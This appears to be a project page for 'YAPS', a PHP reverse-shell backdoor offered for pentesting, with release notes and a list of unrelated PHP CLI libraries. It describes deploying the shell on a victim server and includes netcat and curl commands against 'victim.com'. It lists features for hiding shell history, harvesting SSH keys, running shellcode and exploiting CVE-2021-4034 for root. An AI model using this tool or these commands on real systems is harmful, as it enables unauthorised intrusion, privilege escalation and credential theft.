YAPS - Yet Another PHP Shell

Nicholas Ferreira

Last update: Dec 14, 2022

Related tags

Command Line php backdoor reverse-shell hacking penetration-testing rat pentesting bugbounty pentest webhacking

Overview

YAPS - Yet Another PHP Shell

Yeah, I know, I know... But that's it. =)

As the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there. It is a single PHP file containing all its functions and you can control it via a simple netcat listener (nc -lp 1337).

In the current version (1.0), its main functions support only linux systems, but i'm planning to make it work with Windows too.

It's currently in its first version and I haven't tested it much yet, and there are still many things I intend to do and improve for the next versions (it's not done yet!), so please let me know if you've found any bugs. =)

Features

Single PHP file (no need to install packages, libs, or download tons of files)
Works with netcat, ncat, socat, multi/handler, almost any listener
Customizable password protection
No logs in .bash_history
Can do some enumeration
- Network info (interfaces, iptables rules, active ports)
- User info
- List SUID and GUID files
- Search for SSH keys (public and private)
- List crontab
- List writable PHP files
Auto download LinPEAS, LinEnum or Linux Exploit Suggester
Write and run PHP code on remote host
(Semi) Stabilize shell

Cons

Connection isn't encrypted (yet) (nc does not support SSL)
Not fully interactive (although you can spawn an interactive shell with !stabilize)
- CTRL+C breaks it; can't use arrows to navigate (unless you use rlwrap nc -lp )

Usage

Set up a TCP listener;
Set your IP and port. This can be done by:

2.1 Editing the variables at the start of the script;
2.2 Setting them via web request (curl -x POST -d "x=ip&y=port" victim.com/yaps.php or curl victim.com/yaps.php?x=ip&y=port);

Open yaps.php on browser or curl it;

3.1 You can set yaps.php?s or yaps.php?silent to supress the banner

Hack!

Working commands

!help - Display the help menu
!all-colors - Toggle all colors (compatible with colorless TTY)
!color - Toggle PS1 color (locally only, no environment variable is changed)
!enum - Download LinPEAS and LinEnum to /tmp and get them ready to use
!info - list informations about the target (the enumeration I mentioned above)
!stabilize - Spawn an interactive reverse shell on another port (works w/ sudo, su, mysql, etc.)
!passwd - Password option (enable, disable, set, modify)
!php - Write and run PHP on the remote host
!suggester - Download Linux Exploit Suggester to /tmp and get it ready to use

Screenshots

Changelog

v1.1 - 12/07/2021

Added !all-colors to toggle terminal colors and work with colorless TTYs
Added exit command to close socket (leave shell)
Changed payload in !stabilize to unset HISTSIZE and HISTFILE
Changed the method of obtaining CPU and meminfo in !info

v1.0.1 - 08/07/2021

Changed [x,y,z] to array(x,y,z) to improve compatibility with older PHP versions
Changed payload for interactive shell to work with PHP<5.4

Credits

Some ideas were inspired by this tools:

A REPL for PHP

PsySH PsySH is a runtime developer console, interactive debugger and REPL for PHP. Learn more at psysh.org and in the manual. PsySH manual 💾 Installa

9.4k Jan 6, 2023

CRON for PHP: Calculate the next or previous run date and determine if a CRON expression is due

PHP Cron Expression Parser NOTE This fork has been deprecated and development moved to https://github.com/dragonmantank/cron-expression. More informat

4.9k Jan 5, 2023

A tiny REPL for PHP

Boris A tiny, but robust REPL for PHP. Announcement: I'm looking to add one or two additional collaborators with commit access. If you are actively in

2.2k Dec 30, 2022

PHP's best friend for the terminal.

Running PHP from the command line? CLImate is your new best bud. CLImate allows you to easily output colored text, special formats, and more. Installa

1.8k Dec 30, 2022

An Elegant CLI Library for PHP

Commando An Elegant PHP CLI Library Commando is a PHP command line interface library that beautifies and simplifies writing PHP scripts intended for c

793 Dec 25, 2022

Lovely PHP wrapper for using the command-line

ShellWrap What is it? It's a beautiful way to use powerful Linux/Unix tools in PHP. Easily and logically pipe commands together, capture errors as PHP

745 Dec 30, 2022

Cilex a lightweight framework for creating PHP CLI scripts inspired by Silex

Cilex, a simple Command Line Interface framework Cilex is a simple command line application framework to develop simple tools based on Symfony2 compon

624 Dec 6, 2022

A powerful command line application framework for PHP. It's an extensible, flexible component, You can build your command-based application in seconds!

CLIFramework CLIFramework is a command-line application framework, for building flexiable, simple command-line applications. Commands and Subcommands

428 Dec 13, 2022

[ABANDONED] PHP library for executing commands on multiple remote machines, via SSH

#Shunt Inspired by Ruby's Capistrano, Shunt is PHP library for executing commands on multiple remote machines, via SSH. Specifically, this library was

436 Feb 20, 2022

Releases(v1.5)

v1.5(Feb 12, 2022)
YAPS - Yet Another PHP Shell

v1.5

Added !shellcode to receive and run an arbitrary shellcode

Improved duplicate() function (you can now a range of ports)

Changed function name from stabilize to interactive

Packed embeded codes to save space

Fixed broken links

Prepend TERM=xterm to all commands

Minor improvements

Source code(tar.gz)
Source code(zip)
yaps.php(40.86 KB)
v1.4(Feb 4, 2022)
YAPS - Yet Another PHP Shell

v1.4

Added !pwnkit to exploit CVE-2021-4034 and spawn a root reverse shell

Improved verify_update() function

Minor code improvements

Source code(tar.gz)
Source code(zip)
yaps.php(38.00 KB)